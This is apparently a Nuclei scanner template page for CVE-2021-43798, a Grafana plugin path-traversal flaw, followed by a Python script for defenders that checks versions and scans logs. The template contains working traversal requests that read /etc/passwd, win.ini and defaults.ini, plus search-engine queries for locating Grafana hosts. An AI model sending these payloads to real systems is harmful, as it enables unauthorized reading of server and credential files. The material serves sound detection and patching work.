Grafana v8.x - Arbitrary File Read
ID: CVE-2021-43798
Severity: high
Author: z0ne,dhiyaneshDk,j4vaovo
Tags: cve2021,cve,packetstorm,grafana,lfi
Description
Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is <grafana_host_url>/public/plugins/NAME/, where NAME is the plugin ID for any installed plugin.
YAML Source
id: CVE-2021-43798

info:
  name: Grafana v8.x - Arbitrary File Read
  author: z0ne,dhiyaneshDk,j4vaovo
  severity: high
  description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
  impact: |
    An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
  remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
  reference:
    - https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
    - https://nosec.org/home/detail/4914.html
    - https://github.com/jas502n/Grafana-VulnTips
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43798
    - http://packetstormsecurity.com/files/165198/Grafana-Arbitrary-File-Reading.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-43798
    cwe-id: CWE-22
    epss-score: 0.97474
    epss-percentile: 0.99963
    cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 3
    vendor: grafana
    product: grafana
    shodan-query:
      - title:"Grafana"
      - cpe:"cpe:2.3:a:grafana:grafana"
      - http.title:"grafana"
    fofa-query:
      - title="grafana"
      - app="grafana"
    google-query: intitle:"grafana"
  tags: cve2021,cve,packetstorm,grafana,lfi

http:
  - method: GET
    path:
      - '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini'
      - '{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/plain"

      - type: regex
        regex:
          - 'root:.*:0:([0-9]+):'
          - '\/tmp\/grafana\.sock'
          - '\[(fonts|extensions|Mail|files)\]'
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210096387f76418cde3aa08201c1599d28a7ac136d120501db3bceaba2de097945e9022079f53286825666fd08c3a373bbab2c1861899f90a2f9c8c673150c4067f93275:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This Nuclei template checks a target for CVE-2021-43798 by requesting the traversal paths above and matching the responses (a text/plain body that looks like /etc/passwd, win.ini or Grafana's defaults.ini). Run it with the Nuclei tool against the Grafana base URL:
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-43798.yaml"
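The template above tells you whether a host is exploitable; a responder usually also needs the two checks it does not provide: deciding from a reported version string whether an instance falls in the affected range, and finding past traversal attempts against /public/plugins/ in access logs. The following Python is an added example, not part of the Nuclei template or of Grafana. It assumes the per-branch fix versions listed in the template's remediation (8.0.7, 8.1.8, 8.2.7, 8.3.1), treats pre-release builds such as 8.0.0-beta1 as older than the matching release, parses Common Log Format lines, and uses constructed sample log lines with RFC 5737 addresses and a made-up plugin ID (example-panel).

```python
"""Defender-side checks for CVE-2021-43798 (Grafana plugin path traversal).

Added example; not part of the Nuclei template or of Grafana itself.
  * is_affected_version(): is a reported Grafana version unpatched?
    Derived from the fix releases the template lists (8.0.7, 8.1.8,
    8.2.7, 8.3.1): each 8.0-8.3 branch is affected below its fix release,
    and pre-release builds (8.0.0-beta1) count as older than the release.
  * find_traversal_requests(): scan access-log lines for requests under
    /public/plugins/<id>/ whose URL-decoded, normalized path leaves that
    plugin directory.
LOG_LINES below are constructed for this example.
"""
import re
from posixpath import normpath
from urllib.parse import unquote

# First patched release per affected 8.x minor branch (from the template).
FIXED_PATCH = {0: 7, 1: 8, 2: 7, 3: 1}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-[0-9A-Za-z.]+)?$")
# Common Log Format: client identity user [timestamp] "METHOD PATH PROTO" status bytes
_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
_PLUGIN_RE = re.compile(r"^/public/plugins/([^/]+)/")


def is_affected_version(version: str) -> bool:
    """Return True if `version` (e.g. '8.2.6' or 'v8.0.0-beta1') is unpatched."""
    m = _VERSION_RE.match(version.strip().lstrip("v"))
    if not m:
        raise ValueError(f"unrecognised Grafana version: {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    if major != 8 or minor not in FIXED_PATCH:
        return False  # outside the 8.0-8.3 range described in the advisory
    return patch < FIXED_PATCH[minor]


def resolve_plugin_path(raw_path: str):
    """Return (plugin_id, resolved_path) for a /public/plugins/ request, else None.

    The path is URL-decoded first so encoded dots and slashes (%2e, %2f) are
    seen, then normalized with posixpath.normpath, which collapses '..' the
    way the filesystem would after the segment is joined onto the plugin dir.
    """
    path = unquote(raw_path.split("?", 1)[0])  # drop any query string
    m = _PLUGIN_RE.match(path)
    if not m:
        return None
    return m.group(1), normpath(path)


def find_traversal_requests(lines):
    """Flag log entries whose resolved path escapes /public/plugins/<id>/."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # unparseable line; leave it for other tooling
        client, method, raw_path, status = m.groups()
        resolved = resolve_plugin_path(raw_path)
        if resolved is None:
            continue
        plugin, path = resolved
        if not path.startswith(f"/public/plugins/{plugin}/"):
            hits.append({"client": client, "method": method, "plugin": plugin,
                         "requested": raw_path, "resolved": path,
                         "status": int(status)})
    return hits


# Constructed sample log lines (documentation IPs, made-up plugin ID "example-panel").
LOG_LINES = [
    '203.0.113.7 - - [08/Dec/2021:10:14:02 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1832',
    '203.0.113.7 - - [08/Dec/2021:10:14:03 +0000] "GET /public/plugins/alertlist/..%2F..%2F..%2Fconf/defaults.ini HTTP/1.1" 200 22040',
    '198.51.100.4 - - [08/Dec/2021:10:15:11 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 9012',
    '198.51.100.4 - - [08/Dec/2021:10:15:12 +0000] "GET /api/health HTTP/1.1" 200 52',
    '203.0.113.7 - - [08/Dec/2021:10:16:40 +0000] "GET /public/plugins/example-panel/../../../../windows/win.ini HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for v in ("8.0.0-beta1", "8.2.6", "8.3.0", "8.3.1"):
        print(f"{v:12s} affected={is_affected_version(v)}")
    for hit in find_traversal_requests(LOG_LINES):
        print(f"{hit['client']} {hit['status']} {hit['plugin']} -> {hit['resolved']}")
```

Two caveats when running this over real logs: a reverse proxy in front of Grafana may already collapse `..` before forwarding, so the traversal is visible only in the proxy's own log, not Grafana's; and a non-200 status (the last sample line) still records an attempt worth correlating with the source address, which is why the function keeps every escaping request rather than only successful ones.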